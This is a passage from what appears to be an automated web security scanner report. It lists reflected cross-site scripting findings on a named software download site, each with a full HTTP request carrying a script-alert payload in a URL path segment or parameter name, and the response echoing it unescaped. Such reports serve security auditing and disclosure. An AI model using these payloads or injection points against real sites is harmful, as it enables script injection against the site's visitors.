<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa" />
...[SNIP]...

4.1643. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72117"><script>alert(1)</script>b715466a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1" />
...[SNIP]...

4.1644. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad71c"><script>alert(1)</script>a9e556abaea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html" />
...[SNIP]...

4.1645. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae6b"><script>alert(1)</script>f87477f9823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823" />
...[SNIP]...

4.1646. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f940"><script>alert(1)</script>3ed6d3e13d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1" />
...[SNIP]...

4.1647. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c422"><script>alert(1)</script>5ca42390231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html" />
...[SNIP]...

4.1648. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e997"><script>alert(1)</script>a563157449d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81909


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d" />
...[SNIP]...

4.1649. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6f5"><script>alert(1)</script>37142a6112a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1" />
...[SNIP]...

4.1650. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ff"><script>alert(1)</script>aaabc5d7835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html" />
...[SNIP]...

4.1651. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25089"><script>alert(1)</script>5548c734076 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076" />
...[SNIP]...

4.1652. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41d5"><script>alert(1)</script>6359a8cd029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1" />
...[SNIP]...

4.1653. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6549"><script>alert(1)</script>b1e5c16342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html" />
...[SNIP]...

4.1654. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe78"><script>alert(1)</script>a8e92c56ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6" />
...[SNIP]...

4.1655. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7b"><script>alert(1)</script>a8d922c9ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1" />
...[SNIP]...

4.1656. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed3a"><script>alert(1)</script>e871d75a71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html" />
...[SNIP]...

4.1657. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d39"><script>alert(1)</script>36b459a9d64 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77032


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64" />
...[SNIP]...

4.1658. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e19f5"><script>alert(1)</script>e0881237aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

